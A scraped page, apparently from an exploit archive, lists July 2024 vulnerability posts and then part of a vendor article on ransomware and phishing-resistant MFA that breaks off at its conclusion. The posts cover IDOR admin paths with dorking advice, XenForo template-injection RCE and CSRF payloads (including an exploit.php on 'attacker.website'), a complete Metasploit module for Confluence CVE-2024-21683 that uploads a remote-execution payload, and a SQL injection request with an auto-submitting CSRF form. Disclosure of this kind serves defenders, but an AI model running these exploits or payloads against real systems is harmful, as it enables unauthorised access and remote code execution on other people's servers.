eDesign CMS version 2.0 suffers from an insecure direct object reference vulnerability.

**eDesign CMS 2.0 Insecure Direct Object Reference**

Posted Jul 23, 2024

Authored by indoushka

eDesign CMS version 2.0 suffers from an insecure direct object reference vulnerability.

tags | exploit

SHA-256 | 55a4eca00e7267d8d4d5cdd94c2b99447eef8059c06cab914a3401ebda7966f2

Download | Favorite | View

**eDesign CMS 2.0 Insecure Direct Object Reference**

    ====================================================================================================================================| # Title     : eDesign CMS v2.0 IDOR Vulnerability                                                                                || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : http://gico.io/agop/demos/                                                                                         |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface.[+] use payload : /admin/register[+] https://www/127.0.0.1/yenpresscom/admin/registerGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,069)
*   Arbitrary (16,824)
*   BBS (2,859)
*   Bypass (1,852)
*   CGI (1,033)
*   Code Execution (7,777)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,380)
*   DoS (24,989)
*   Encryption (2,389)
*   Exploit (53,058)
*   File Inclusion (4,257)
*   File Upload (989)
*   Firewall (822)
*   Info Disclosure (2,876)
*   Intrusion Detection (914)
*   Java (3,141)
*   JavaScript (895)
*   Kernel (7,164)
*   Local (14,773)
*   Magazine (586)
*   Overflow (13,148)
*   Perl (1,435)
*   PHP (5,220)
*   Proof of Concept (2,381)
*   Protocol (3,723)
*   Python (1,629)
*   Remote (31,604)
*   Root (3,625)
*   Rootkit (525)
*   Ruby (631)
*   Scanner (1,657)
*   Security Tool (8,022)
*   Shell (3,270)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,271)
*   SQL Injection (16,585)
*   TCP (2,439)
*   Trojan (690)
*   UDP (901)
*   Virus (669)
*   Vulnerability (32,895)
*   Web (9,947)
*   Whitepaper (3,781)
*   x86 (967)
*   XSS (18,236)
*   Other

**File Archives**

*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   August 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,090)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,082)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,531)
*   HPUX (880)
*   iOS (376)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,465)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,354)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,678)
*   UNIX (9,430)
*   UnixWare (187)
*   Windows (6,667)
*   Other

eDesign CMS 2.0 Insecure Direct Object Reference

Agop CMS version 1.0 suffers from an insecure direct object reference vulnerability.

**Agop CMS 1.0 Insecure Direct Object Reference**

Posted Jul 22, 2024

Authored by indoushka

Agop CMS version 1.0 suffers from an insecure direct object reference vulnerability.

tags | exploit

SHA-256 | 1ed22de09e417dcaed8d9f03d8d62abd6b70fc4587552e70a4bdbce253d3011b

Download | Favorite | View

**Agop CMS 1.0 Insecure Direct Object Reference**

    ====================================================================================================================================| # Title     : Agop CMS v1.0 IDOR Vulnerability                                                                                   || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : http://gico.io/agop/demos/                                                                                         |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface.[+] use payload : /admin/managePages.php[+] https://www/127.0.0.1/tiktrades.com/admin/managePages.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,061)
*   Arbitrary (16,823)
*   BBS (2,859)
*   Bypass (1,852)
*   CGI (1,033)
*   Code Execution (7,776)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,380)
*   DoS (24,985)
*   Encryption (2,389)
*   Exploit (53,050)
*   File Inclusion (4,256)
*   File Upload (989)
*   Firewall (822)
*   Info Disclosure (2,875)
*   Intrusion Detection (914)
*   Java (3,141)
*   JavaScript (895)
*   Kernel (7,161)
*   Local (14,770)
*   Magazine (586)
*   Overflow (13,147)
*   Perl (1,435)
*   PHP (5,219)
*   Proof of Concept (2,381)
*   Protocol (3,723)
*   Python (1,629)
*   Remote (31,602)
*   Root (3,625)
*   Rootkit (525)
*   Ruby (631)
*   Scanner (1,657)
*   Security Tool (8,021)
*   Shell (3,270)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,271)
*   SQL Injection (16,584)
*   TCP (2,439)
*   Trojan (690)
*   UDP (901)
*   Virus (669)
*   Vulnerability (32,893)
*   Web (9,947)
*   Whitepaper (3,781)
*   x86 (967)
*   XSS (18,234)
*   Other

**File Archives**

*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   August 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,090)
*   BSD (376)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,082)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,531)
*   HPUX (880)
*   iOS (376)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,456)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,351)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,673)
*   UNIX (9,429)
*   UnixWare (187)
*   Windows (6,667)
*   Other

Agop CMS 1.0 Insecure Direct Object Reference

XenForo versions 2.2.15 and below suffer from a remote code execution vulnerability in the Template system.

    -----------------------------------------------------------------------XenForo <= 2.2.15 (Template System) Remote Code Execution Vulnerability-----------------------------------------------------------------------[-] Software Link:https://xenforo.com[-] Affected Versions:Version 2.2.15 and prior versions.[-] Vulnerability Description:XenForo implements a template system which gives complete control overthe layout of XenForo pages. Through these templates, it might bepossible to call certain "callback methods", however there is a sortof "sandbox" which allows to solely call read-only methods: a methodis to be considered read-only when it begins with one of the allowedprefixes, such as "get" or "filter". Malicious users might be able tobypass this "sandbox" by abusing the getRepository() method from theXF\Mvc\Entity\Manager class in order to get an instance object of theXF\Util\Arr class, and from there they can abuse its filterRecursive()static method in order to execute arbitrary callbacks or functions(internally, this method calls the array_filter() PHP function with anattacker-controlled "callback" parameter). As such, this can beexploited to e.g. execute arbitrary OS commands by using a payloadlike the following within a template, which will try to execute thepassthru() PHP function passing to it the string "whoami" as argument,potentially resulting in the execution of the "whoami" command on theweb server:{{ $xf.app.em.getRepository('XF\Util\Arr').filterRecursive(['whoami'],'passthru')}}Successful exploitation of this vulnerability requires an account withpermissions to administer styles or widgets.[-] Solution:Update to a fixed version or apply the vendor patches.[-] Disclosure Timeline:[22/02/2024] - Vulnerability details sent to SSD Secure Disclosure[05/06/2024] - Vendor released patches and fixed versions[14/06/2024] - CVE identifier requested[16/06/2024] - CVE identifier assigned[16/07/2024] - Coordinated public disclosure[-] CVE Reference:The Common Vulnerabilities and Exposures project (cve.mitre.org) hasassigned the name CVE-2024-38458 to this vulnerability.[-] Credits:Vulnerability discovered by Egidio Romano.[-] Other References:https://xenforo.com/community/threads/222133https://ssd-disclosure.com/ssd-advisory-xenforo-rce-via-csrf/[-] Original Advisory:http://karmainsecurity.com/KIS-2024-06

Xenforo 2.2.15 Remote Code Execution

XenForo versions 2.2.15 and below suffer from a cross site request forgery vulnerability in Widget::actionSave.

-------------------------------------------------------------------------------  
XenForo <= 2.2.15 (Widget::actionSave) Cross-Site Request Forgery Vulnerability  
-------------------------------------------------------------------------------

[-] Software Link:

https://xenforo.com

[-] Affected Versions:

Version 2.2.15 and prior versions.

[-] Vulnerability Description:

The XF\Admin\Controller\Widget::actionSave() method, defined into the  
/src/XF/Admin/Controller/Widget.php script, does not check whether the  
current HTTP request is a POST or a GET before saving a widget.  
XenForo does perform anti-CSRF checks for POST requests only, as such  
this method can be abused in a Cross-Site Request Forgery (CSRF)  
attack to create/modify arbitrary XenForo widgets via GET requests,  
and this can also be exploited in tandem with KIS-2024-06 to perform  
CSRF-based Remote Code Execution (RCE) attacks.

Furthermore, XenForo implements a BB code system, as such this  
vulnerability could also be exploited through "Stored CSRF" attacks by  
abusing the [img] BB code tag, creating a thread or a private message  
(to be sent to the victim user) like the following:

[img]https://attacker.website/exploit.php[/img]

Where the exploit.php script hosted on the attacker-controlled website  
could be something like this:

<?php

$url = "https://victim.website/xenforo/";

header("Location:  
{$url}admin.php?widgets/save&definition_id=html&widget_key=RCE&positions[pub_sidebar_top]=1&display_condition=true&options[template]={{\$xf.app.em.getRepository('XF\\Util\\Arr').filterRecursive(['id'],'passthru')}}");

?>

Successful exploitation of this vulnerability requires a victim user  
with permissions to administer styles or widgets to be currently  
logged into the Admin Control Panel.

[-] Solution:

Update to a fixed version or apply the vendor patches.

[-] Disclosure Timeline:

[22/02/2024] - Vulnerability details sent to SSD Secure Disclosure  
[05/06/2024] - Vendor released patches and fixed versions  
[14/06/2024] - CVE identifier requested  
[16/06/2024] - CVE identifier assigned  
[16/07/2024] - Coordinated public disclosure

[-] CVE Reference:

The Common Vulnerabilities and Exposures project (cve.mitre.org) has  
assigned the name CVE-2024-38457 to this vulnerability.

[-] Credits:

Vulnerability discovered by Egidio Romano.

[-] Other References:

https://xenforo.com/community/threads/222133  
https://ssd-disclosure.com/ssd-advisory-xenforo-rce-via-csrf/

[-] Original Advisory:

http://karmainsecurity.com/KIS-2024-05

XenForo 2.2.15 Cross Site Request Forgery

This Metasploit module exploits an authenticated administrator-level vulnerability in Atlassian Confluence, tracked as CVE-2024-21683. The vulnerability exists due to the Rhino script engine parser evaluating tainted data from uploaded text files. This facilitates arbitrary code execution. This exploit will authenticate, validate user privileges, extract the underlying host OS information, then trigger remote code execution. All versions of Confluence prior to 7.17 are affected, as are many versions up to 8.9.0.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::Remote::HTTP::Atlassian::Confluence::Version  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Atlassian Confluence Administrator Code Macro Remote Code Execution',        'Description' => %q{          This module exploits an authenticated administrator-level vulnerability in Atlassian Confluence,          tracked as CVE-2024-21683. The vulnerability exists due to the Rhino script engine parser evaluating          tainted data from uploaded text files. This facilitates arbitrary code execution. This exploit will          authenticate, validate user privileges, extract the underlying host OS information, then trigger          remote code execution. All versions of Confluence prior to 7.17 are affected, as are many versions          up to 8.9.0.        },        'License' => MSF_LICENSE,        'Author' => [          'Ankita Sawlani', # Discovery          'Huong Kieu', # Public Analysis          'W01fh4cker', # PoC Exploit          'remmons-r7'  # MSF Exploit        ],        'References' => [          ['CVE', '2024-21683'],          ['URL', 'https://jira.atlassian.com/browse/CONFSERVER-95832'],          ['URL', 'https://realalphaman.substack.com/p/quick-note-about-cve-2024-21683-authenticated'],          ['URL', 'https://github.com/W01fh4cker/CVE-2024-21683-RCE']        ],        'DisclosureDate' => '2024-05-21',        'Privileged' => false, # `NT AUTHORITY\NETWORK SERVICE` on Windows by default, `confluence` on Linux by default.        'Platform' => ['unix', 'linux', 'win'],        'Arch' => [ARCH_CMD],        'DefaultTarget' => 0,        'Targets' => [ [ 'Default', {} ] ],        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          # The access log files will contain requests to the exploitable administrator dashboard endpoints.          'SideEffects' => [IOC_IN_LOGS]        }      )    )    register_options(      [        # By default, Confluence serves an HTTP service on TCP port 8090.        Opt::RPORT(8090),        OptString.new('TARGETURI', [true, 'The URI path to Confluence', '/']),        OptString.new('ADMIN_USER', [true, 'The Confluence administrator username', '']),        OptString.new('ADMIN_PASS', [true, 'The Confluence administrator password', ''])      ]    )  end  def check    # Begin by retrieving the version string from the login page.    version = get_confluence_version    return CheckCode::Unknown('Failed to determine the Confluence version') unless version    # Check the extracted version against all documented vulnerable versions.    if version == Rex::Version.new('8.9.0') ||       version.between?(Rex::Version.new('8.8.0'), Rex::Version.new('8.8.1')) ||       version.between?(Rex::Version.new('8.7.0'), Rex::Version.new('8.7.2')) ||       version.between?(Rex::Version.new('8.6.0'), Rex::Version.new('8.6.2')) ||       version.between?(Rex::Version.new('8.5.0'), Rex::Version.new('8.5.8')) ||       version.between?(Rex::Version.new('8.4.0'), Rex::Version.new('8.4.5')) ||       version.between?(Rex::Version.new('8.3.0'), Rex::Version.new('8.3.4')) ||       version.between?(Rex::Version.new('8.2.0'), Rex::Version.new('8.2.3')) ||       version.between?(Rex::Version.new('8.1.0'), Rex::Version.new('8.1.4')) ||       version.between?(Rex::Version.new('8.0.0'), Rex::Version.new('8.0.4')) ||       version.between?(Rex::Version.new('7.20.0'), Rex::Version.new('7.20.3')) ||       version.between?(Rex::Version.new('7.19.0'), Rex::Version.new('7.19.21')) ||       version.between?(Rex::Version.new('7.18.0'), Rex::Version.new('7.18.3')) ||       version.between?(Rex::Version.new('7.17.0'), Rex::Version.new('7.17.5')) ||       # According to Atlassian, all versions < 7.17 are vulnerable.       version.between?(Rex::Version.new('0.0.0'), Rex::Version.new('7.16.999'))      Exploit::CheckCode::Appears("Exploitable version of Confluence: #{version}")    else      Exploit::CheckCode::Safe("Non-exploitable version of Confluence: #{version}")    end  end  def login(username, password)    # Perform a POST request to login to Confluence with the provided credentials.    send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'dologin.action'),      'keep_cookies' => 'true',      'vars_post' => {        'os_username' => username,        'os_password' => password,        'os_destination' => '%2FXsuccessX'      }    )  end  def elevate    # Elevates the current administrator session. By default, administrator sessions will remain elevated for two minutes after this takes place.    vprint_status('Secure Administrator Sessions enabled - elevating session')    # Grab a CSRF token from the elevation page form.    csrf_elevation = get_csrf('doauthenticate.action', 'elevation')    # With the valid elevation token, escalate the current administrator session.    res_elevate = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'doauthenticate.action'),      'keep_cookies' => 'true',      'vars_post' => {        'atl_token' => csrf_elevation,        'password' => datastore['ADMIN_PASS'],        'authenticate' => 'Confirm',        'destination' => '%2FXsuccessX'      }    )    # Connection failure, no response, or malformed response.    fail_with(Failure::Unknown, 'Target did not respond as expected during privilege elevation') unless res_elevate    # Confirm that the response indicates a successful elevation.    fail_with(Failure::UnexpectedReply, 'The session elevation appears to have failed') unless res_elevate.code == 302 && res_elevate.headers['Location'].include?('XsuccessX')    vprint_status('Administrator session has been elevated')  end  def get_csrf(page, operation)    # Perform a GET request to the target page to grab a CSRF token.    res_get_csrf = send_request_cgi(      'method' => 'GET',      'keep_cookies' => 'true',      'uri' => normalize_uri(target_uri.path, page)    )    # Connection failure, no response, or malformed response.    fail_with(Failure::Unknown, "Target did not respond as expected when fetching #{operation} CSRF token") unless res_get_csrf    # If the response is not 200 and does not contain the string "atl_token", the target page has behaved unexpectedly.    fail_with(Failure::UnexpectedReply, "Target returned a response that did not contain #{operation} CSRF token") unless res_get_csrf.code == 200 && res_get_csrf.body.include?('atl_token')    # Response page should contain '<input type="hidden" name="atl_token" value="tokenhere">'.    csrf_token = res_get_csrf.get_xml_document.xpath('//input[@name="atl_token"]').first&.values&.[](2)    # Token should be 40 characters.    fail_with(Failure::UnexpectedReply, "Target did not return the expected 40-character #{operation} CSRF token") unless csrf_token&.length == 40    vprint_status("Grabbed #{operation} CSRF token: #{csrf_token}")    csrf_token  end  def get_host_os    # Elevated Confluence administrators can view system information, which will be used to confirm the target OS.    res_sysinfo = send_request_cgi(      'method' => 'GET',      'keep_cookies' => 'true',      'uri' => normalize_uri(target_uri.path, 'admin', 'systeminfo.action')    )    # Connection failure, no response, or malformed response.    fail_with(Failure::Unknown, 'Target did not respond as expected while getting host OS') unless res_sysinfo    # Confirm that the response is the expected system info page.    fail_with(Failure::UnexpectedReply, 'The system information page failed to return the expected data') unless res_sysinfo.code == 200 && res_sysinfo.body.include?('operating.system')    # Extract the OS string from the response DOM.    os = res_sysinfo.get_xml_document.xpath('//span[@id="operating.system"]').first&.text    vprint_status("Target returned the operating system string '#{os}'")    # If the string begins with "win", assume the host is Windows. If it's anything else, assume it's something Unix-based.    os.downcase.start_with?('win') ? 'win' : 'nix'  end  def upload_payload(shell)    # Grab a valid macro dashboard CSRF token.    csrf_macro = get_csrf('/admin/plugins/newcode/configure.action', 'macro')    # Initialize a multipart form.    payload_form = Rex::MIME::Message.new    # ProcessBuilder string - this will inject the sh/cmd.exe sequence as the first two args and decode the base64 msf fetch payload as the third.    payload_string = "new java.lang.ProcessBuilder(#{shell}, new java.lang.String(java.util.Base64.getDecoder().decode('#{Rex::Text.encode_base64(payload.encoded)}'))).start()"    # Add the CSRF token, payload file, and 'newLanguageName' value. Both the 'languageFile' name and the 'newLanguageName' value can be any string.    payload_form.add_part(csrf_macro, 'text/plain', 'binary', 'form-data; name="atl_token"')    payload_form.add_part(payload_string, 'text/plain', 'binary', "form-data; name=\"languageFile\"; filename=\"#{rand_text_hex(10)}\"")    payload_form.add_part(rand_text_hex(10), 'text/plain', 'binary', 'form-data; name="newLanguageName"')    vprint_status("Crafted ProcessBuilder payload string: #{payload_string}")    vprint_status('Sending POST request to trigger code execution')    # POST the multipart form for code execution. A neutral error will be returned in the web response, which we can ignore.    res_upload = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'admin', 'plugins', 'newcode', 'addlanguage.action'),      'keep_cookies' => 'true',      'ctype' => "multipart/form-data; boundary=#{payload_form.bound}",      'data' => payload_form.to_s    )    # Connection failure, no response, or malformed response.    print_error('Target did not respond as expected during code execution attempt') unless res_upload    # If the response to the multipart request does not return a 200.    print_error('The application returned a non-200 response during code execution attempt') unless res_upload.code == 200  end  def exploit    # Authenticate to Confluence.    res_login = login(datastore['ADMIN_USER'], datastore['ADMIN_PASS'])    # Connection failure, no response, or malformed response.    fail_with(Failure::Unknown, 'Target did not respond as expected during authentication') unless res_login    # If authentication does not result in a redirect with the provided "XsuccessX" 'Location' header value.    fail_with(Failure::BadConfig, 'The target did not accept the provided credentials') unless res_login.code == 302 && res_login.headers['Location'].include?('XsuccessX')    vprint_status('Successfully authenticated to Confluence')    # Attempt to fetch a privileged page with the provided valid credentials to confirm the user is an administrator.    res_check_admin = send_request_cgi(      'method' => 'GET',      'keep_cookies' => 'true',      'uri' => normalize_uri(target_uri.path, 'admin', 'console.action')    )    # Connection failure, no response, or malformed response.    fail_with(Failure::Unknown, 'Target did not respond as expected during privilege check') unless res_check_admin    # If a 'Location' header is returned in the response, the current session doesn't have full privileges.    if res_check_admin.headers['Location']      # Confluence will redirect to the login page if the current user does not have admin privileges, so check for that here.      if res_check_admin.headers['Location'].include?('login.action')        fail_with(Failure::BadConfig, 'The provided credentials are valid, but the user does not have administrative privileges')      end      vprint_status('The provided user is an administrator')      # Check whether Secure Administrator Sessions feature (sudo-like elevation prompt) is enabled. This feature is default on newer versions.      if res_check_admin.headers['Location'].include?('authenticate.action')        elevate      end    # User is an administrator and Secure Administrator Sessions is disabled.    else      vprint_status('The provided user is an administrator')    end    # As an administrator, check the host OS for selection between sh/cmd.exe in payload    shell = get_host_os == 'win' ? '"cmd.exe", "/c"' : '"/bin/sh", "-c"'    # Upload a text file containing a payload to be evaluated by the script engine    upload_payload(shell)  endend

Atlassian Confluence Administrator Code Macro Remote Code Execution

Cinema Booking System version 1.0 suffers from remote SQL injection and cross site request forgery vulnerabilities.

    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ .:. Exploit Title > Cinema Booking System - Multiple Vulnerabilities.:. Google Dorks .:.intitle:Cinema Booking System.:. Date: July 5, 2024.:. Exploit Author: bRpsd.:. Contact: cy[at]live.no.:. Vendor -> https://www.phpjabbers.com/.:. Product -> https://www.phpjabbers.com/cinema-booking-system/.:. Product Version -> 1.0.:. DBMS -> MySQL.:. Tested on > macOS [*nix Darwin Kernel], on local xampp@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ ##################### |PRODUCT DESCRIPTION| #####################"The Cinema Booking System is a PHP/MySQL-based seat and ticket reservation system allowing bookings in a few easy steps. Users can process online payments, manage reservations, and customize events. This powerful cinema ticket booking system can be deployed on any website offering tickets for movies, theater, and other scheduled performances. If you purchase the booking script with a Developer License, you will be able to make your own changes to the PHP source code."Vulnerability 1: Authenticated SQL InjectionGET http://localhost/index.php?controller=pjAdminBookings&action=pjActionGetBooking&column=%27&direction=DESC&page=0&rowCount=10&uuid=%27&c_name=&from_price=&to_price=&c_email=&event_id= HTTP/1.1host: localhostUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0Accept: */*Accept-Language: en-US,en;q=0.5X-Requested-With: XMLHttpRequestConnection: keep-aliveReferer: http://localhost/index.php?controller=pjAdminBookings&action=pjActionIndexCookie: CinemaBooking=8e2ffd6bba921f964458b47fb27eb952Priority: u=1Response:You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '\' DESCLIMIT 0, 10' at line 5===========================================================================================Vulnerability 2: Cross Site Request ForgeryRisk:Privilege EscalationProof of concept:<h1>CSRF PoC</h1>    <form id="csrfForm" action="http://localhost/index.php?controller=pjAdminUsers&action=pjActionCreate" method="POST">        <input type="hidden" name="user_create" value="1">        <input type="hidden" name="role_id" value="1">        <input type="hidden" name="email" value="test@test.com">        <input type="hidden" name="password" value="123123">        <input type="hidden" name="name" value="test">        <input type="hidden" name="phone" value="">        <input type="hidden" name="status" value="T">    </form>    <script type="text/javascript">        document.getElementById('csrfForm').submit();    </script></body></html>

Cinema Booking System 1.0 SQL Injection / Cross Site Request Forgery

A vulnerability was found in ShopXO up to 6.1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file `extend/base/Uploader.php`. The manipulation of the argument source leads to server-side request forgery. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-270367. NOTE: The original disclosure confuses CSRF with SSRF.

**ShopXO Server-Side Request Forgery Vulnerability**

Moderate severity GitHub Reviewed Published Jul 5, 2024 to the GitHub Advisory Database • Updated Jul 8, 2024

GHSA-c96r-38gv-grp4: ShopXO Server-Side Request Forgery Vulnerability

103 models of Toshiba Multi-Function Printers (MFP) are vulnerable to 40 different vulnerabilities including remote code execution, local privilege escalation, xml injection, and more.

Toshiba Multi-Function Printers 40 Vulnerabilities

The cybersecurity threat landscape has witnessed a dramatic and alarming rise in the average ransomware payment, an increase exceeding 500%. Sophos, a global leader in cybersecurity, revealed in its annual "State of Ransomware 2024" report that the average ransom payment has increased 500% in the last year with organizations that paid a ransom reporting an average payment of $2 million, up from

The cybersecurity threat landscape has witnessed a dramatic and alarming rise in the average ransomware payment, an increase exceeding 500%. Sophos, a global leader in cybersecurity, revealed in its annual "State of Ransomware 2024" report that the average ransom payment has increased 500% in the last year with organizations that paid a ransom reporting an average payment of $2 million, up from $400,000 in 2023. Separately, RISK & INSURANCE, a leading media source for the insurance industry reported recently that in 2023 the median ransom demand soared to $20 million in 2023 from $1.4 million in 2022, and payment skyrocketed to $6.5 million in 2023 from $335,000 in 2022, much more than 500%.

This shocking surge is a testament to the increasing sophistication of cyberattacks and the significant vulnerabilities inherent in outdated security methods. The most significant factor contributing to this trend is a broad reliance on twenty-year-old, legacy Multi-Factor Authentication (MFA), which is proving entirely inadequate against modern cyberattacks. Moreover, the adoption of Generative AI has enabled cybercriminals to craft remarkably convincing phishing attacks, making them nearly undetectable to even well-trained users. This article explores the reasons behind the rapid increase in average ransomware payments, the shortcomings of legacy MFA, and the need for next-generation MFA solutions.

****Three Factors Driving The Increase in Ransomware Payments********Better targeting by cybercriminals****

In pursuit of ever-increasing ransom payments, cybercriminals have refocused their efforts and tactics to identify and cripple organizations where they can cause the greatest interruption in operations to extract the largest ransom payments. Examples include the $100 million loss by MGM, the billion-dollar-plus loss by Change HealthCare, and the yet-to-be determined losses by CDK Global. Cybercriminals are acutely aware of this economic calculus and leverage it to demand exorbitant sums, knowing that victims are likely to comply to minimize losses. It is a simple yet painful business decision for the victim.

****Utilization of Generative AI in phishing attacks****

Generative AI technologies have revolutionized the way cybercriminals create phishing emails. These tools generate highly convincing and personalized phishing messages free from grammatical and spelling errors that are indistinguishable from legitimate communications. By analyzing vast amounts of data, Generative AI can mimic writing styles, create believable scenarios, and target individuals with precision. These attacks convincingly mimic emails from trusted sources, complete with accurate branding and contextually relevant information. Organizations that rely on employee training as a defense strategy are increasingly seeing diminishing returns for their investment.

Protect your organization from rising ransomware losses with phishing-resistant MFA. Download the white paper "Secure Your Data with Phishing-Resistant MFA" to discover how next-generation wearable MFA can protect your sensitive information and overcome the shortcomings of legacy solutions.

****Outdated Security Practices****

Multi-Factor Authentication (MFA) has been a mainstay of perimeter security for decades, designed to enhance the protection of enterprise networks by requiring multiple forms of verification. However, legacy MFA systems including Knowledge Based Authentication (KBA), One Time Passwords (OTP), and authentication apps, developed twenty years ago, are increasingly inadequate against modern cyberattacks. Legacy MFA has been defeated in the overwhelming majority of successful ransomware attacks. Legacy MFA is now quickly compromised by cybercriminals in the following ways.

*   Phishing Attacks: Attackers trick users into providing their MFA credentials through fake login pages or social engineering tactics.
*   SIM Swapping: Attackers convince a mobile carrier to transfer the victim's phone number to a SIM card they control, intercepting SMS-based MFA codes.
*   Man-in-the-Middle (MitM) Attacks: Attackers intercept communications between the user and the online service, capturing the MFA tokens and using them to authenticate.
*   Malware: Malicious software on a user's device can capture authentication tokens, passwords, or keystrokes, allowing attackers to bypass MFA.
*   Other Social Engineering: Attackers may manipulate individuals into revealing their MFA credentials or into performing actions that bypass MFA controls.
*   Session Hijacking: Attackers gain access to an active session token (e.g., through XSS, CSRF attacks, or session fixation) and use it to bypass MFA. Once they have the session token, they can impersonate the user without needing to re-authenticate.
*   Account Recovery Process Exploitation**:** Attackers exploit weaknesses in the account recovery process to reset the user's MFA settings, often bypassing MFA.

****The Case for Implementing Next-Generation MFA****

To effectively combat the virtual tsunami of ransomware attacks, organizations must consider phishing-resistant, next-generation MFA technologies. These advanced solutions incorporate a range of sophisticated authentication factors, including biometrics (such as fingerprint and facial recognition making it significantly harder for cybercriminals to replicate or compromise. This is increasingly relevant when considering that the Verizon Data Breach Incident Report consistently reports that more than two-thirds of breaches are the result of compromised credentials and the Cybersecurity and Infrastructure Security Agency (CISA), an agency of the DHS reports that 90% of successful ransomware attacks are the result of phishing attacks.

****The Importance of Biometrics****

Biometric authentication leverages the unique physical attributes of authorized users such as their fingerprints, facial characteristics, and other traits that are extremely difficult to forge or steal. Biometrics play a crucial role in nest-generation Multi-Factor Authentication (MFA) due to several key benefits and unique characteristics:

*   Unlike passwords or tokens, biometric traits are unique to each individual and are extremely difficult to replicate or steal.
*   Biometric data is inherently linked to the individual, making it impossible to share or transfer, reducing the risk of credential theft.
*   Biometrics eliminate poor passwords practices and helps mitigate risks associated with weak, reused, or compromised passwords, which are common attack vectors.
*   Biometrics are immune to phishing attacks since they cannot be easily captured or entered on fake websites.
*   Biometrics help reduce fraud by ensuring that the individual accessing the system is indeed who they claim to be, preventing identity theft and unauthorized access.

****User Convenience is Essential****

Biometrics offers a quick and seamless authentication process, often just requiring a scan or touch, enhancing the user experience. No passwords for users to memorize or dongles to avoid losing. This reduces the burden on users and minimizes errors, lockouts, and helpdesk calls.

*   If an MFA solution is easy to use, more users are likely to adopt it. Complex or cumbersome processes deter users from engaging with and supporting organizational security measures.
*   Users are more likely to follow security protocols and use MFA consistently if it integrates smoothly into their daily routines without causing disruptions.
*   Simplified MFA processes reduce the likelihood of user errors, such as mistyping codes or misplacing tokens. This leads to fewer lockouts and support requests saving time and resources for the organization.
*   Convenient MFA contributes to a positive sentiment towards security policies and the IT department. Satisfied employees are more likely to embrace security measures.
*   Quick and easy authentication processes ensure that employees can access the resources they need without unnecessary delays, maintaining productivity levels.

In summary, user convenience in MFA solutions is essential to ensure high adoption rates, reduce errors and support costs, enhance security, maintain productivity, and improve overall user satisfaction. By balancing security with ease of use, organizations can create an effective security environment that is both effective and user-friendly.

****Choosing the Right MFA solution****

Selecting the appropriate phishing-resistant, next-generation MFA solution requires careful consideration of the organization's unique requirements. Factors to consider include the types of authentication factors supported, integration capabilities, ease of use, and scalability. Organizations should opt for solutions that offer a balance of security, usability, and flexibility.

Implementing next-generation MFA should be approached in phases to minimize disruption and ensure a smooth transition. This phased approach allows for thorough testing and user acclimatization.

The cybersecurity landscape is constantly evolving, and so must an organization's security measures. Continuous monitoring and regular updates are crucial to maintaining the effectiveness of phishing-resistant and next-generation MFA solutions. Organizations should establish a framework for ongoing security assessments, system updates, and threat intelligence integration to stay ahead of emerging threats.

****Conclusion****

